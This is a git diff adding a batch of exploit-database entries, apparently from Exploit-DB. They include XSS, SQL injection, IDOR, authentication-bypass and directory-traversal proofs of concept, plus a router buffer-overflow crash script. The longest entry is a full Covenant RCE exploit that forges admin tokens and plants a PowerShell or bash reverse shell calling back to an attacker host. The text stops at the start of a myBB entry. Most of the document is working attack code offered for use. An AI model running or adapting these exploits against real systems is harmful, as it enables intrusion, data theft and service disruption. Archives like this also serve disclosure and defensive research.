diff --git a/exploits/cgi/webapps/51148.txt b/exploits/cgi/webapps/51148.txt new file mode 100644 index 000000000..51e73ebf1 --- /dev/null +++ b/exploits/cgi/webapps/51148.txt @@ -0,0 +1,20 @@ +# Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS) +# Google Dork: inurl:/scripts/wa.exe +# Date: 12/01/2022 +# Exploit Author: Shaunt Der-Grigorian +# Vendor Homepage: https://www.lsoft.com/ +# Software Link: https://www.lsoft.com/download/listserv.asp +# Version: 17 +# Tested on: Windows Server 2019 +# CVE : CVE-2022-39195 + +A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter. + +To reproduce, please visit +http://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E +(or whichever URL you can use for testing instead of localhost). + +The "c" parameter will reflect any value given onto the page. + +# Solution +This vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); . \ No newline at end of file diff --git a/exploits/cgi/webapps/51149.txt b/exploits/cgi/webapps/51149.txt new file mode 100644 index 000000000..9b83aa17b --- /dev/null +++ b/exploits/cgi/webapps/51149.txt @@ -0,0 +1,17 @@ +# Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR) +# Google Dork: inurl:/scripts/wa.exe +# Date: 12/02/2022 +# Exploit Author: Shaunt Der-Grigorian +# Vendor Homepage: https://www.lsoft.com/ +# Software Link: https://www.lsoft.com/download/listserv.asp +# Version: 17 +# Tested on: Windows Server 2019 +# CVE : CVE-2022-40319 + +# Steps to replicate +1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container. +2. Intercept your attacking profile's browser traffic using Burp. +3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]). +4. Click on your email address on the top right and select "Edit profile". +5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account. +4. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request. \ No newline at end of file diff --git a/exploits/hardware/dos/51137.py b/exploits/hardware/dos/51137.py new file mode 100755 index 000000000..ead1f0b47 --- /dev/null +++ b/exploits/hardware/dos/51137.py @@ -0,0 +1,49 @@ +# Exploit Title: ZTE-H108NS - Stack Buffer Overflow (DoS) +# Date: 19-11-2022 +# Exploit Author: George Tsimpidas +# Vendor: https://www.zte.com.cn/global/ +# Firmware: H108NSV1.0.7u_ZRD_GR2_A68 +# Usage: python zte-exploit.py +# CVE: N/A +# Tested on: Debian 5.18.5 + +#!/usr/bin/python3 + + +import sys +import socket +from time import sleep + +host = sys.argv[1] # Recieve IP from user +port = int(sys.argv[2]) # Recieve Port from user + +junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae" +* 5 + + +buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1" ++ junk + b"&TestBtn=START HTTP/1.1\r\n" +buffer += b"Host: 192.168.1.1\r\n" +buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) +Gecko/20100101 Firefox/91.0\r\n" +buffer += b"Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" +buffer += b"Accept-Language: en-US,en;q=0.5\r\n" +buffer += b"Accept-Encoding: gzip, deflate\r\n" +buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n" +buffer += b"Connection: Keep-Alive\r\n" +buffer += b"Cookie: +SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2; +_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n" +buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n" + + + + +print("[*] Sending evil payload...") +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) +s.send(buffer) +sleep(1) +s.close() +print("[+] Crashing boom boom ~ check if target is down ;)") \ No newline at end of file diff --git a/exploits/hardware/remote/51138.txt b/exploits/hardware/remote/51138.txt new file mode 100644 index 000000000..52e201976 --- /dev/null +++ b/exploits/hardware/remote/51138.txt @@ -0,0 +1,35 @@ +# Exploit Title: Router ZTE-H108NS - Authentication Bypass +# Date: 19-11-2022 +# Exploit Author: George Tsimpidas +# Vendor: https://www.zte.com.cn/global/ +# Firmware: H108NSV1.0.7u_ZRD_GR2_A68 +# CVE: N/A +# Tested on: Debian 5.18.5 + +Description : + +When specific http methods are listed within a security constraint, +then only those +methods are protected. Router ZTE-H108NS defines the following http +methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed +operation which allows the HEAD to be implemented correctly with every +Response Status Code. + + +Proof Of Concept : + +Below request bypasses successfully the Basic Authentication, and +grants access to the Administration Panel of the Router. + + +HEAD /cgi-bin/tools_admin.asp HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: SESSIONID=1cd6bb77 +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 \ No newline at end of file diff --git a/exploits/linux/webapps/51139.txt b/exploits/linux/webapps/51139.txt new file mode 100644 index 000000000..f6a495a12 --- /dev/null +++ b/exploits/linux/webapps/51139.txt @@ -0,0 +1,75 @@ +# Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass +#Date: 19-11-2022 +# Exploit Author: George Tsimpidas +# Vendor: https://github.com/gpg/boa +# CVE: N/A +# Tested on: Debian 5.18.5 + +Description : + +Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the +correct security constraint on the HEAD http method allowing everyone +to bypass the Basic Authorization Mechanism. + +Culprit : + +if (!memcmp(req->logline, "GET ", 4)) +req->method = M_GET; +else if (!memcmp(req->logline, "HEAD ", 5)) +/* head is just get w/no body */ +req->method = M_HEAD; +else if (!memcmp(req->logline, "POST ", 5)) +req->method = M_POST; +else { +log_error_doc(req); +fprintf(stderr, "malformed request: \"%s\"\n", req->logline); +send_r_not_implemented(req); +return 0; +} + +The req->method = M_HEAD; is being parsed directly on the response.c +file, looking at how the method is being implemented for one of the +response codes : + +/* R_NOT_IMP: 505 */ +void send_r_bad_version(request * req) +{ + SQUASH_KA(req); + req->response_status = R_BAD_VERSION; + if (!req->simple) { + req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n"); + print_http_headers(req); + req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate +header */ + } + if (req->method != M_HEAD) { + req_write(req, + "505 HTTP Version Not +Supported\n" + "

505 HTTP Version Not Supported

\nHTTP +versions " + "other than 0.9 and 1.0 " + "are not supported in Boa.\n

Version encountered: "); + req_write(req, req->http_version); + req_write(req, "

\n"); + } + req_flush(req); +} + + +Above code condition indicates that if (req->method != M_HEAD) therefore +if the the requested method does not equal to M_HEAD then + +req_write(req, + "505 HTTP Version Not +Supported\n" + "

505 HTTP Version Not Supported

\nHTTP +versions " + "other than 0.9 and 1.0 " + "are not supported in Boa.\n

Version encountered: "); + req_write(req, req->http_version); + req_write(req, "

\n"); + } + +So if the method actually contains the http method of HEAD it's being +passed for every function that includes all the response code methods. \ No newline at end of file diff --git a/exploits/multiple/webapps/51134.txt b/exploits/multiple/webapps/51134.txt new file mode 100644 index 000000000..8623422d9 --- /dev/null +++ b/exploits/multiple/webapps/51134.txt @@ -0,0 +1,32 @@ +# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection +# Date: 2022/10/02 +# Exploit Author: lvren +# Vendor Homepage: http://cms.iteachyou.cc/ +# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip +# Version: v4.0.0 +# CVE: CVE-2022-43128 + +Proof Of Concept: + +POST /admin/search/doSearch HTTP/1.1 +Host: localhost:8888 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 80 +Origin: http://localhost:8888 +Connection: close +Referer: http://localhost:8888/admin/search/doSearch +Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739 +Upgrade-Insecure-Requests: 1 + +entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386 + + + +lvren +lvren@lvre.ntesmail.com + +签名由 网易灵犀办公 定制 \ No newline at end of file diff --git a/exploits/multiple/webapps/51141.py b/exploits/multiple/webapps/51141.py new file mode 100755 index 000000000..a311f02a4 --- /dev/null +++ b/exploits/multiple/webapps/51141.py @@ -0,0 +1,438 @@ +# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE) +# Exploit Author: xThaz +# Author website: https://xthaz.fr/ +# Date: 2022-09-11 +# Vendor Homepage: https://cobbr.io/Covenant.html +# Software Link: https://github.com/cobbr/Covenant +# Version: v0.1.3 - v0.5 +# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker + +# Vulnerability +## Discoverer: coastal +## Date: 2020-07-13 +## Discoverer website: https://blog.null.farm +## References: +## - https://blog.null.farm/hunting-the-hunters +## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb + +# !/usr/bin/env python3 +# encoding: utf-8 + + +import jwt # pip3 install PyJWT +import json +import warnings +import base64 +import re +import random +import argparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome +from Crypto.Util.Padding import pad +from Crypto.Cipher import AES +from requests import request # pip3 install requests +from subprocess import run +from pwn import remote, context # pip3 install pwntools +from os import remove, urandom +from shutil import which +from urllib.parse import urlparse +from pathlib import Path +from time import time + + +def check_requirements(): + if which("mcs") is None: + print("Please install the mono framework in order to compile the payload.") + print("https://www.mono-project.com/download/stable/") + exit(-1) + + +def random_hex(length): + alphabet = "0123456789abcdef" + return ''.join(random.choice(alphabet) for _ in range(length)) + + +def request_api(method, token, route, body=""): + warnings.simplefilter('ignore', InsecureRequestWarning) + + return request( + method, + f"{args.target}/api/{route}", + json=body, + headers={ + "Authorization": f"Bearer {token}", + "Content-Type": "application/json" + }, + verify=False + ) + + +def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"): + secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC' + + payload_data = { + "sub": username, + "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585", + "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid, + "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [ + "User", + "Administrator" + ], + "exp": int(time()) + 360, + "iss": "Covenant", + "aud": "Covenant" + } + + token = jwt.encode(payload_data, secret_key, algorithm='HS256') + return token + + +def get_id_admin(token, json_roles): + id_admin = "" + for role in json_roles: + if role["name"] == "Administrator": + id_admin = role["id"] + print(f"\t[*] Found the admin group id : {id_admin}") + break + else: + print("\t[!] Did not found admin group id, quitting !") + exit(-1) + + id_admin_user = "" + json_users_roles = request_api("get", token, f"users/roles").json() + for user_role in json_users_roles: + if user_role["roleId"] == id_admin: + id_admin_user = user_role["userId"] + print(f"\t[*] Found the admin user id : {id_admin_user}") + break + else: + print("\t[!] Did not found admin id, quitting !") + exit(-1) + + json_users = request_api("get", token, f"users").json() + for user in json_users: + if user["id"] == id_admin_user: + username_admin = user["userName"] + print(f"\t[*] Found the admin username : {username_admin}") + return username_admin, id_admin_user + else: + print("\t[!] Did not found admin username, quitting !") + exit(-1) + + +def compile_payload(): + if args.os == "windows": + payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""' + else: + payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""' + + dll = """using System; +using System.Reflection; + +namespace ExampleDLL{ + public class Class1{ + public Class1(){ + } + + public void Main(string[] args){ + System.Diagnostics.Process.Start(""" + payload + """); + } + } +} +""" + + temp_dll_path = f"/tmp/{random_hex(8)}" + Path(f"{temp_dll_path}.cs").write_bytes(dll.encode()) + print(f"\t[*] Writing payload in {temp_dll_path}.cs") + + compilo_path = which("mcs") + compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"]) + if compilation.returncode: + print("\t[!] Error when compiling DLL, quitting !") + exit(-1) + print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll") + + dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode() + + remove(temp_dll_path + ".cs") + remove(temp_dll_path + ".dll") + print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll") + return dll_encoded + + +def generate_wrapper(dll_encoded): + wrapper = """public static class MessageTransform { + public static string Transform(byte[] bytes) { + try { + string assemblyBase64 = \"""" + dll_encoded + """\"; + var assemblyBytes = System.Convert.FromBase64String(assemblyBase64); + var assembly = System.Reflection.Assembly.Load(assemblyBytes); + foreach (var type in assembly.GetTypes()) { + object instance = System.Activator.CreateInstance(type); + object[] args = new object[] { new string[] { \"\" } }; + try { + type.GetMethod(\"Main\").Invoke(instance, args); + } + catch {} + } + } + catch {} + return System.Convert.ToBase64String(bytes); + } + + public static byte[] Invert(string str) { + return System.Convert.FromBase64String(str); + } +}""" + + return wrapper + + +def upload_profile(token, wrapper): + body = { + 'httpUrls': [ + '/en-us/index.html', + '/en-us/docs.html', + '/en-us/test.html' + ], + 'httpRequestHeaders': [ + {'name': 'User-Agent', + 'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 ' + 'Safari/537.36'}, + {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'} + ], + 'httpResponseHeaders': [ + {'name': 'Server', 'value': 'Microsoft-IIS/7.5'} + ], + 'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73', + 'httpGetResponse': '{DATA}', + 'httpPostResponse': '{DATA}', + 'id': 0, + 'name': random_hex(8), + 'description': '', + 'type': 'HTTP', + 'messageTransform': wrapper + } + + response = request_api("post", token, "profiles/http", body) + + if not response.ok: + print("\t[!] Failed to create the listener profile, quitting !") + exit(-1) + else: + profile_id = response.json().get('id') + print(f"\t[*] Profile created with id {profile_id}") + print("\t[*] Successfully created the listener profile") + return profile_id + + +def generate_valid_listener_port(impersonate_token, tries=0): + if tries >= 10: + print("\t[!] Tried 10 times to generate a listener port but failed, quitting !") + exit(-1) + + port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT + listeners = request_api("get", impersonate_token, "listeners").json() + + port_used = [] + for listener in listeners: + port_used.append(listener["bindPort"]) + + if port in port_used: + print(f"\t[!] Port {port} is already taken by another listener, retrying !") + generate_valid_listener_port(impersonate_token, tries + 1) + else: + print(f"\t[*] Port {port} seems free") + return port + + +def get_id_listener_type(impersonate_token, listener_name): + response = request_api("get", impersonate_token, "listeners/types") + if not response.ok: + print("\t[!] Failed to get the listener type, quitting !") + exit(-1) + else: + for listener_type in response.json(): + if listener_type["name"] == listener_name: + print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}') + return listener_type["id"] + + +def generate_listener(impersonate_token, profile_id): + listener_port = generate_valid_listener_port(impersonate_token) + listener_name = random_hex(8) + data = { + 'useSSL': False, + 'urls': [ + f"http://0.0.0.0:{listener_port}" + ], + 'id': 0, + 'name': listener_name, + 'bindAddress': "0.0.0.0", + 'bindPort': listener_port, + 'connectAddresses': [ + "0.0.0.0" + ], + 'connectPort': listener_port, + 'profileId': profile_id, + 'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"), + 'status': 'Active' + } + + response = request_api("post", impersonate_token, "listeners/http", data) + + if not response.ok: + print("\t[!] Failed to create the listener, quitting !") + exit(-1) + else: + print("\t[*] Successfully created the listener") + listener_id = response.json().get("id") + return listener_id, listener_port + + +def create_grunt(impersonate_token, data): + stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"] + if stager_code == "": + stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"] + if stager_code == "": + print("\t[!] Failed to create the grunt payload, quitting !") + exit(-1) + + print("\t[*] Successfully created the grunt payload") + return stager_code + + +def get_grunt_config(impersonate_token, listener_id): + data = { + 'id': 0, + 'listenerId': listener_id, + 'implantTemplateId': 1, + 'name': 'Binary', + 'description': 'Uses a generated .NET Framework binary to launch a Grunt.', + 'type': 'binary', + 'dotNetVersion': 'Net35', + 'runtimeIdentifier': 'win_x64', + 'validateCert': True, + 'useCertPinning': True, + 'smbPipeName': 'string', + 'delay': 0, + 'jitterPercent': 0, + 'connectAttempts': 0, + 'launcherString': 'GruntHTTP.exe', + 'outputKind': 'consoleApplication', + 'compressStager': False + } + + stager_code = create_grunt(impersonate_token, data) + aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code) + guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code) + if not aes_key or not guid_prefix: + print("\t[!] Failed to retrieve the grunt configuration, quitting !") + exit(-1) + + aes_key = aes_key.group(1) + guid_prefix = guid_prefix.group(1) + print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}") + return aes_key, guid_prefix + + +def aes256_cbc_encrypt(key, message): + iv_bytes = urandom(16) + key_decoded = base64.b64decode(key) + encoded_message = pad(message.encode(), 16) + + cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes) + encrypted = cipher.encrypt(encoded_message) + + hmac = HMAC.new(key_decoded, digestmod=SHA256) + signature = hmac.update(encrypted).digest() + + return encrypted, iv_bytes, signature + + +def trigger_exploit(listener_port, aes_key, guid): + message = "tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==AQAB" + + ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message) + data = { + "GUID": guid, + "Type": 0, + "Meta": '', + "IV": base64.b64encode(iv).decode(), + "EncryptedMessage": base64.b64encode(ciphered).decode(), + "HMAC": base64.b64encode(signature).decode() + } + + json_data = json.dumps(data).encode("utf-8") + payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73" + + if send_exploit(listener_port, "Cookie", guid, payload): + print("\t[*] Exploit succeeded, check listener") + else : + print("\t[!] Exploit failed, retrying") + if send_exploit(listener_port, "Cookies", guid, payload): + print("\t[*] Exploit succeeded, check listener") + else: + print("\t[!] Exploit failed, quitting") + + +def send_exploit(listener_port, header_cookie, guid, payload): + context.log_level = 'error' + + request = f"""POST /en-us/test.html HTTP/1.1\r +Host: {IP_TARGET}:{listener_port}\r +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r +{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r +Content-Type: application/x-www-form-urlencoded\r +Content-Length: {len(payload)}\r +\r +{payload} +""".encode() + + sock = remote(IP_TARGET, listener_port) + sock.sendline(request) + response = sock.recv().decode() + sock.close() + + if "HTTP/1.1 200 OK" in response: + return True + else: + return False + +if __name__ == "__main__": + check_requirements() + + parser = argparse.ArgumentParser() + parser.add_argument("target", + help="URL where the Covenant is hosted, example : https://127.0.0.1:7443") + parser.add_argument("os", + help="Operating System of the target", + choices=["windows", "linux"]) + parser.add_argument("lhost", + help="IP of the machine that will receive the reverse shell") + parser.add_argument("lport", + help="Port of the machine that will receive the reverse shell") + args = parser.parse_args() + + IP_TARGET = urlparse(args.target).hostname + + print("[*] Getting the admin info") + sacrificial_token = craft_jwt("xThaz") + roles = request_api("get", sacrificial_token, "roles").json() + admin_username, admin_id = get_id_admin(sacrificial_token, roles) + impersonate_token = craft_jwt(admin_username, admin_id) + print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}") + + print("[*] Generating payload") + dll_encoded = compile_payload() + wrapper = generate_wrapper(dll_encoded) + print("[*] Uploading malicious listener profile") + profile_id = upload_profile(impersonate_token, wrapper) + + print("[*] Generating listener") + listener_id, listener_port = generate_listener(impersonate_token, profile_id) + + print("[*] Triggering the exploit") + aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id) + trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}") \ No newline at end of file diff --git a/exploits/multiple/webapps/51142.txt b/exploits/multiple/webapps/51142.txt new file mode 100644 index 000000000..15dd2764a --- /dev/null +++ b/exploits/multiple/webapps/51142.txt @@ -0,0 +1,54 @@ +# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal +# Exploit Author: Spinae +# Vendor Homepage: https://www.virtualreception.nl/ +# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY +# Tested on: all + +We discovered the web server of the Virtual Reception appliance is prone to +an unauthenticated directory traversal vulnerability. This allows an +attacker to traverse outside the server root directory by specifying files +at the end of a URL request. +This is a NUC5i5RY + +http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts +http://[ip address]/C:/windows/WindowsUpdate.log +... + +A user called 'receptie' exists on the Windows system: + +http://[ip address]/c:/users/receptie/ntuser.dat +http://[ip address]/c:/users/receptie/ntuser.ini +http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log +... +http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User +Data/Default/Login Data +http://[ip +address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State +http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User +Data/Default/Cookies +... + +The appliance also keeps a log of the visitors that register at the +entrance: + +http://[ip address]/visitors.csv + +hash icon for shodan searches: + +https://www.shodan.io/search?query=http.favicon.hash%3A656388049 + +No reply from the vendor (phone, email, website form submissions), first +reported in 2021. + +-- +DISCLAIMER: Unless indicated otherwise, the information contained in this +message is privileged and confidential, and is intended only for the use of +the addressee(s) named above and others who have been specifically +authorized to receive it. If you are not the intended recipient, you are +hereby notified that any dissemination, distribution or copying of this +message and/or attachments is strictly prohibited. The company accepts no +liability for any damage caused by any virus transmitted by this message. +Furthermore, the company does not warrant a proper and complete +transmission of this information, nor does it accept liability for any +delays. If you have received this message in error, please contact the +sender and delete the message. Thank you. \ No newline at end of file diff --git a/exploits/multiple/webapps/51150.txt b/exploits/multiple/webapps/51150.txt new file mode 100644 index 000000000..e6247273e --- /dev/null +++ b/exploits/multiple/webapps/51150.txt @@ -0,0 +1,67 @@ +# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) +# Exploit Author: Andrey Stoykov +# Software Link: https://github.com/Shoplazza/LifeStyle +# Version: 1.1 +# Tested on: Ubuntu 20.04 + + +Stored XSS #1: + +To reproduce do the following: + +1. Login as normal user account +2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post" +3. Select "Title" and enter payload "> + + +// HTTP POST request showing XSS payload + +PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1= +.1 +Host: test1205.myshoplaza.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= +101 Firefox/100.0 +[...] + +{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\">alert(1)","excerpt":"Excerpt\">","c= +ontent":"

\">

"[...] + + +// HTTP response showing unsanitized XSS payload + +HTTP/1.1 200 OK +Content-Type: application/json; charset=3Dutf-8 +[...] + +{"article":{"title":"Title\">","excerpt":"Excerpt\= +">","published":true,"seo_title":"Title\">"[...] + + +// HTTP GET request to trigger XSS payload + +GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9= +.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC= +03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK= +Enfj9L49I HTTP/1.1 +Host: test1205.myshoplaza.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= +101 Firefox/100.0 +[...] + + +// HTTP response showing unsanitized XSS payload + +HTTP/1.1 200 OK +Content-Type: text/html; charset=3DUTF-8 +[...] + + +Title"><script>alert(1)</script> + +[...] + +--rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2-- \ No newline at end of file diff --git a/exploits/php/webapps/51135.txt b/exploits/php/webapps/51135.txt new file mode 100644 index 000000000..4990185fc --- /dev/null +++ b/exploits/php/webapps/51135.txt @@ -0,0 +1,56 @@ +## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS) +## Author: nu11secur1ty +## Date: 11.20.2022 +## Vendor: https://www.clicshopping.org/forum/ +## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402 +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3 + +## Description: +The name of an arbitrarily supplied URL parameter is copied into the +value of an HTML tag attribute which is encapsulated in double +quotation marks. +The attacker can trick users to open a very dangerous link or he can +get sensitive information, also he can destroy some components of your +system. + +## STATUS: HIGH Vulnerability + +[+] Payload: + +```js +GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1 +HTTP/1.1 +Host: pwnedhost.com +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 +Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3) + +## Proof and Exploit: +[href]()https://streamable.com/rzpgsu + +## Time spent +`1:00` + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51136.txt b/exploits/php/webapps/51136.txt new file mode 100644 index 000000000..91a652f11 --- /dev/null +++ b/exploits/php/webapps/51136.txt @@ -0,0 +1,173 @@ +# Exploit Title: myBB forums 